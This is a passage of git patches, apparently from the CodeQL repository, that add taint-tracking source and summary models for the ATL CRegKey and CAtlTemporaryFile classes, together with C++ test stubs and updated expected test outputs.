LocalFlowSourceFunction { + CAtlTemporaryFileRead() { this.getClassAndName("Read") instanceof CAtlTemporaryFile } + + override predicate hasLocalFlowSource(FunctionOutput output, string description) { + output.isParameterDeref(0) and + description = "string read by " + this.getName() + } +} diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 3440940a4f0..35698f13e84 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -213,5 +213,5 @@ void test_CAtlTemporaryFile() { CAtlTemporaryFile file; char buffer[1024]; DWORD bytesRead; - file.Read(buffer, 1024, bytesRead); // $ MISSING: local_source + file.Read(buffer, 1024, bytesRead); // $ local_source } From 5aada39a4e0a146f880bd2d94b719f975fde5412 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:40:37 +0000 Subject: [PATCH 0749/1267] C++: Add failing tests for 'CRegKey'. --- .../dataflow/source-sink-tests/atl.cpp | 172 ++++++++++++++++++ 1 file changed, 172 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 35698f13e84..e8fbcbf9660 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -215,3 +215,175 @@ void test_CAtlTemporaryFile() { DWORD bytesRead; file.Read(buffer, 1024, bytesRead); // $ local_source } + +struct CRegKey { + CRegKey() throw(); + CRegKey(CRegKey& key) throw(); + explicit CRegKey(HKEY hKey) throw(); + CRegKey(CAtlTransactionManager* pTM) throw(); + + ~CRegKey() throw(); + void Attach(HKEY hKey) throw(); + LONG Close() throw(); + + LONG Create( + HKEY hKeyParent, + LPCTSTR lpszKeyName, + LPTSTR lpszClass, + DWORD dwOptions, + REGSAM samDesired, + LPSECURITY_ATTRIBUTES lpSecAttr, + LPDWORD lpdwDisposition) throw(); + + LONG DeleteSubKey(LPCTSTR lpszSubKey) throw(); + LONG DeleteValue(LPCTSTR lpszValue) throw(); + HKEY Detach() throw(); + + LONG EnumKey( + DWORD iIndex, + LPTSTR pszName, + LPDWORD pnNameLength, + FILETIME* pftLastWriteTime) throw(); + + LONG Flush() throw(); + + LONG GetKeySecurity( + SECURITY_INFORMATION si, + PSECURITY_DESCRIPTOR psd, + LPDWORD pnBytes) throw(); + + LONG NotifyChangeKeyValue( + BOOL bWatchSubtree, + DWORD dwNotifyFilter, + HANDLE hEvent, + BOOL bAsync) throw(); + + LONG Open( + HKEY hKeyParent, + LPCTSTR lpszKeyName, + REGSAM samDesired) throw(); + + LONG QueryBinaryValue( + LPCTSTR pszValueName, + void* pValue, + ULONG* pnBytes) throw(); + + LONG QueryDWORDValue( + LPCTSTR pszValueName, + DWORD& dwValue) throw(); + + LONG QueryGUIDValue( + LPCTSTR pszValueName, + GUID& guidValue) throw(); + + LONG QueryMultiStringValue( + LPCTSTR pszValueName, + LPTSTR pszValue, + ULONG* pnChars) throw(); + + LONG QueryQWORDValue( + LPCTSTR pszValueName, + ULONGLONG& qwValue) throw(); + + LONG QueryStringValue( + LPCTSTR pszValueName, + LPTSTR pszValue, + ULONG* pnChars) throw(); + + LONG QueryValue( + LPCTSTR pszValueName, + DWORD* pdwType, + void* pData, + ULONG* pnBytes) throw(); + + LONG QueryValue( + DWORD& dwValue, + LPCTSTR lpszValueName); + + LONG QueryValue( + LPTSTR szValue, + LPCTSTR lpszValueName, + DWORD* pdwCount); + + LONG RecurseDeleteKey(LPCTSTR lpszKey) throw(); + + LONG SetBinaryValue( + LPCTSTR pszValueName, + const void* pValue, + ULONG nBytes) throw(); + + LONG SetDWORDValue(LPCTSTR pszValueName, DWORD dwValue) throw(); + + LONG SetGUIDValue(LPCTSTR pszValueName, REFGUID guidValue) throw(); + + LONG SetKeySecurity(SECURITY_INFORMATION si, PSECURITY_DESCRIPTOR psd) throw(); + + LONG SetKeyValue( + LPCTSTR lpszKeyName, + LPCTSTR lpszValue, + LPCTSTR lpszValueName) throw(); + + LONG SetMultiStringValue(LPCTSTR pszValueName, LPCTSTR pszValue) throw(); + + LONG SetQWORDValue(LPCTSTR pszValueName, ULONGLONG qwValue) throw(); + + LONG SetStringValue( + LPCTSTR pszValueName, + LPCTSTR pszValue, + DWORD dwType) throw(); + + LONG SetValue( + LPCTSTR pszValueName, + DWORD dwType, + const void* pValue, + ULONG nBytes) throw(); + + static LONG SetValue( + HKEY hKeyParent, + LPCTSTR lpszKeyName, + LPCTSTR lpszValue, + LPCTSTR lpszValueName); + + LONG SetValue( + DWORD dwValue, + LPCTSTR lpszValueName); + + LONG SetValue( + LPCTSTR lpszValue, + LPCTSTR lpszValueName, + bool bMulti, + int nValueLen); + + operator HKEY() const throw(); + CRegKey& operator= (CRegKey& key) throw(); + + HKEY m_hKey; +}; + +void test_CRegKey() { + CRegKey key; + char data[1024]; + ULONG bytesRead; + key.QueryBinaryValue("foo", data, &bytesRead); // $ MISSING: local_source + + DWORD value; + key.QueryDWORDValue("foo", value); // $ MISSING: local_source + + GUID guid; + key.QueryGUIDValue("foo", guid); // $ MISSING: local_source + + key.QueryMultiStringValue("foo", data, &bytesRead); // $ MISSING: local_source + + ULONGLONG qword; + key.QueryQWORDValue("foo", qword); // $ MISSING: local_source + + key.QueryStringValue("foo", data, &bytesRead); // $ MISSING: local_source + + key.QueryValue(data, "foo", &bytesRead); // $ MISSING: local_source + + DWORD type; + key.QueryValue("foo", &type, data, &bytesRead); // $ MISSING: local_source + + DWORD value2; + key.QueryValue(value2, "foo"); // $ MISSING: local_source +} \ No newline at end of file From d69de0cc761fe1739962fb8277eb4a8c4afe5748 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:43:39 +0000 Subject: [PATCH 0750/1267] C++: Add a MaD model for 'CRegKey' and mark query calls as local flow sources. --- cpp/ql/lib/ext/CRegKey.model.yml | 19 ++++ cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../cpp/models/implementations/CRegKey.qll | 87 +++++++++++++++++++ .../dataflow/source-sink-tests/atl.cpp | 18 ++-- 4 files changed, 116 insertions(+), 9 deletions(-) create mode 100644 cpp/ql/lib/ext/CRegKey.model.yml create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml new file mode 100644 index 00000000000..52b742029ac --- /dev/null +++ b/cpp/ql/lib/ext/CRegKey.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CRegKey", True, "CRegKey", "(CRegKey&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CRegKey", True, "CRegKey", "(HKEY)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CRegKey", True, "Attach", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryBinaryValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryDWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryMultiStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryQWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "(DWORD&,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[**0]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "operator HKEY", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index cd86b53f90e..83bda3e2a44 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -56,3 +56,4 @@ private import implementations.CPathT private import implementations.CAtlFile private import implementations.CAtlFileMapping private import implementations.CAtlTemporaryFile +private import implementations.CRegKey diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll new file mode 100644 index 00000000000..e6d1a5ba09e --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll @@ -0,0 +1,87 @@ +private import cpp +private import semmle.code.cpp.models.interfaces.FlowSource +private import semmle.code.cpp.ir.dataflow.FlowSteps +private import semmle.code.cpp.dataflow.new.DataFlow + +/** The `CRegKey` class from the Microsoft "Active Template Library". */ +class CRegKey extends Class { + CRegKey() { this.hasGlobalName("CRegKey") } +} + +module CRegKey { + /** The `m_hKey` member on a object of type `CRegKey`. */ + class MhKey extends Field { + MhKey() { + this.getDeclaringType() instanceof CRegKey and + this.getName() = "m_hKey" + } + } + + private class MhKeyPathTaintInheritingContent extends TaintInheritingContent, + DataFlow::FieldContent + { + MhKeyPathTaintInheritingContent() { this.getField() instanceof MhKey } + } + + private class CRegKeyMemberFunction extends MemberFunction { + string name; + + CRegKeyMemberFunction() { this.getClassAndName(name) instanceof CRegKey } + } + + abstract private class CRegKeyFlowSource extends CRegKeyMemberFunction, LocalFlowSourceFunction { + FunctionOutput output; + + final override predicate hasLocalFlowSource(FunctionOutput output_, string description) { + output_ = output and + description = "registry string read by " + name + } + } + + /** The `CRegKey::QueryBinaryValue` function from Win32. */ + class QueryBinaryValue extends CRegKeyFlowSource { + QueryBinaryValue() { name = "QueryBinaryValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryDWORDValue` function from Win32. */ + class QueryDwordValue extends CRegKeyFlowSource { + QueryDwordValue() { name = "QueryDWORDValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryGUIDValue` function from Win32. */ + class QueryGuidValue extends CRegKeyFlowSource { + QueryGuidValue() { name = "QueryGUIDValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryMultiStringValue` function from Win32. */ + class QueryMultiStringValue extends CRegKeyFlowSource { + QueryMultiStringValue() { name = "QueryMultiStringValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryQWORDValue` function from Win32. */ + class QueryQwordValue extends CRegKeyFlowSource { + QueryQwordValue() { name = "QueryQWORDValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryStringValue` function from Win32. */ + class QueryStringValue extends CRegKeyFlowSource { + QueryStringValue() { name = "QueryStringValue" and output.isParameterDeref(1) } + } + + /** The `CRegKey::QueryValue` function from Win32. */ + class QueryValue extends CRegKeyFlowSource { + QueryValue() { + name = "QueryValue" and + ( + this.getNumberOfParameters() = 4 and + output.isParameterDeref(2) + or + this.getNumberOfParameters() = 2 and + output.isParameterDeref(0) + or + this.getNumberOfParameters() = 3 and + output.isParameterDeref(0) + ) + } + } +} diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index e8fbcbf9660..7df5e3dc1a0 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -364,26 +364,26 @@ void test_CRegKey() { CRegKey key; char data[1024]; ULONG bytesRead; - key.QueryBinaryValue("foo", data, &bytesRead); // $ MISSING: local_source + key.QueryBinaryValue("foo", data, &bytesRead); // $ local_source DWORD value; - key.QueryDWORDValue("foo", value); // $ MISSING: local_source + key.QueryDWORDValue("foo", value); // $ local_source GUID guid; - key.QueryGUIDValue("foo", guid); // $ MISSING: local_source + key.QueryGUIDValue("foo", guid); // $ local_source - key.QueryMultiStringValue("foo", data, &bytesRead); // $ MISSING: local_source + key.QueryMultiStringValue("foo", data, &bytesRead); // $ local_source ULONGLONG qword; - key.QueryQWORDValue("foo", qword); // $ MISSING: local_source + key.QueryQWORDValue("foo", qword); // $ local_source - key.QueryStringValue("foo", data, &bytesRead); // $ MISSING: local_source + key.QueryStringValue("foo", data, &bytesRead); // $ local_source - key.QueryValue(data, "foo", &bytesRead); // $ MISSING: local_source + key.QueryValue(data, "foo", &bytesRead); // $ local_source DWORD type; - key.QueryValue("foo", &type, data, &bytesRead); // $ MISSING: local_source + key.QueryValue("foo", &type, data, &bytesRead); // $ local_source DWORD value2; - key.QueryValue(value2, "foo"); // $ MISSING: local_source + key.QueryValue(value2, "foo"); // $ local_source } \ No newline at end of file From 19e7c3776049a71101397e5fde8156969e932d66 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:47:29 +0000 Subject: [PATCH 0751/1267] C++: Update the final test changes. Nothing exciting here. --- .../dataflow/external-models/flow.expected | 10 +- .../external-models/validatemodels.expected | 14 +- .../taint-tests/test_mad-signatures.expected | 848 ++++++++++++++++++ 3 files changed, 861 insertions(+), 11 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index d1e895f2eaf..3c5b69b09f4 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected @@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:819 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:817 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:818 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:809 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:807 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:808 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:818 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:808 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:819 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:809 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index b0276013106..166d834ea76 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected @@ -5,23 +5,25 @@ | Dubious member name "operator LPSTR" in summary model. | | Dubious member name "operator LPWSTR" in summary model. | | Dubious member name "operator PCXSTR" in summary model. | -| Dubious member name "operator StringType&" in summary model. | -| Dubious member name "operator T*" in summary model. | -| Dubious member name "operator const StringType&" in summary model. | | Dubious member name "operator&" in summary model. | | Dubious member name "operator*" in summary model. | | Dubious member name "operator+=" in summary model. | | Dubious member name "operator->" in summary model. | | Dubious member name "operator=" in summary model. | | Dubious member name "operator[]" in summary model. | +| Dubious signature "(CAtlFile &)" in summary model. | | Dubious signature "(CRegKey&)" in summary model. | | Dubious signature "(DWORD&,LPCTSTR)" in summary model. | | Dubious signature "(InputIterator,InputIterator,const Allocator &)" in summary model. | +| Dubious signature "(LPCTSTR,DWORD *,void *,ULONG *)" in summary model. | +| Dubious signature "(LPTSTR,LPCTSTR,DWORD *)" in summary model. | | Dubious signature "(const CComBSTR&)" in summary model. | +| Dubious signature "(const CComSafeArray &)" in summary model. | | Dubious signature "(const CComSafeArray&)" in summary model. | -| Dubious signature "(const SAFEARRAY&)" in summary model. | -| Dubious signature "(const SAFEARRAY*)" in summary model. | -| Dubious signature "(const SAFEARRAYBOUND*, UINT)" in summary model. | +| Dubious signature "(const SAFEARRAY &)" in summary model. | +| Dubious signature "(const SAFEARRAY *)" in summary model. | +| Dubious signature "(const SAFEARRAYBOUND *,UINT)" in summary model. | +| Dubious signature "(const T &,BOOL)" in summary model. | | Dubious signature "(const deque &)" in summary model. | | Dubious signature "(const deque &,const Allocator &)" in summary model. | | Dubious signature "(const forward_list &)" in summary model. | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 26031f42c0a..1f84cd3379a 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected @@ -1,4 +1,90 @@ signatureMatches +| atl.cpp:68:3:68:15 | _U_STRINGorID | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:68:3:68:15 | _U_STRINGorID | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:69:3:69:15 | _U_STRINGorID | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:256:3:256:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:256:3:256:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:410:3:410:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:410:3:410:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | +| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 1 | +| atl.cpp:412:3:412:10 | CComBSTR | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:412:3:412:10 | CComBSTR | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:413:3:413:10 | CComBSTR | (LPCSTR) | CComBSTR | Append | 0 | +| atl.cpp:413:3:413:10 | CComBSTR | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:418:11:418:16 | Append | (wchar_t) | CComBSTR | Append | 0 | +| atl.cpp:419:11:419:16 | Append | (char) | CComBSTR | Append | 0 | +| atl.cpp:420:11:420:16 | Append | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:420:11:420:16 | Append | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:421:11:421:16 | Append | (LPCSTR) | CComBSTR | Append | 0 | +| atl.cpp:421:11:421:16 | Append | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:422:11:422:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 0 | +| atl.cpp:422:11:422:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:424:11:424:21 | AppendBytes | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:437:8:437:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:437:8:437:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | +| atl.cpp:437:8:437:17 | LoadString | (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | +| atl.cpp:438:8:438:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:438:8:438:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:447:13:447:22 | operator+= | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:447:13:447:22 | operator+= | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:543:11:543:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 0 | +| atl.cpp:543:11:543:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 1 | +| atl.cpp:762:8:762:10 | Add | (const deque &,const Allocator &) | deque | deque | 1 | +| atl.cpp:762:8:762:10 | Add | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:762:8:762:10 | Add | (const list &,const Allocator &) | list | list | 1 | +| atl.cpp:762:8:762:10 | Add | (const vector &,const Allocator &) | vector | vector | 1 | +| atl.cpp:762:8:762:10 | Add | (deque &&,const Allocator &) | deque | deque | 1 | +| atl.cpp:762:8:762:10 | Add | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:762:8:762:10 | Add | (list &&,const Allocator &) | list | list | 1 | +| atl.cpp:762:8:762:10 | Add | (vector &&,const Allocator &) | vector | vector | 1 | +| atl.cpp:773:8:773:12 | SetAt | (const deque &,const Allocator &) | deque | deque | 1 | +| atl.cpp:773:8:773:12 | SetAt | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:773:8:773:12 | SetAt | (const list &,const Allocator &) | list | list | 1 | +| atl.cpp:773:8:773:12 | SetAt | (const vector &,const Allocator &) | vector | vector | 1 | +| atl.cpp:773:8:773:12 | SetAt | (deque &&,const Allocator &) | deque | deque | 1 | +| atl.cpp:773:8:773:12 | SetAt | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:773:8:773:12 | SetAt | (list &&,const Allocator &) | list | list | 1 | +| atl.cpp:773:8:773:12 | SetAt | (vector &&,const Allocator &) | vector | vector | 1 | +| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | deque | deque | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | forward_list | forward_list | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | list | list | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | vector | vector | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 1 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 1 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 2 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 1 | +| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 2 | +| atl.cpp:839:15:839:26 | SetExtraInfo | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:840:15:840:25 | SetHostName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:841:15:841:25 | SetPassword | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:844:15:844:27 | SetSchemeName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:845:15:845:24 | SetUrlPath | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:846:15:846:25 | SetUserName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| constructor_delegation.cpp:10:2:10:8 | MyValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| constructor_delegation.cpp:19:2:19:15 | MyDerivedValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| standalone_iterators.cpp:103:27:103:36 | operator+= | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| stl.h:165:8:165:16 | push_back | (char) | CComBSTR | Append | 0 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | deque | assign | 0 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | deque | assign | 1 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | forward_list | assign | 0 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | forward_list | assign | 1 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | list | assign | 0 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | list | assign | 1 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | vector | assign | 0 | +| stl.h:181:47:181:52 | append | (InputIt,InputIt) | vector | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | deque | assign | 0 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | deque | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | forward_list | assign | 0 | @@ -7,6 +93,14 @@ signatureMatches | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | list | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | vector | assign | 0 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | vector | assign | 1 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | deque | assign | 0 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | deque | assign | 1 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | forward_list | assign | 0 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | forward_list | assign | 1 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | list | assign | 0 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | list | assign | 1 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | vector | assign | 0 | +| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | vector | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | deque | assign | 0 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | deque | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | forward_list | assign | 0 | @@ -15,6 +109,18 @@ signatureMatches | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | list | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | vector | assign | 0 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | vector | assign | 1 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 0 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 1 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 2 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 0 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 1 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 2 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 0 | +| stl.h:189:42:189:47 | insert | 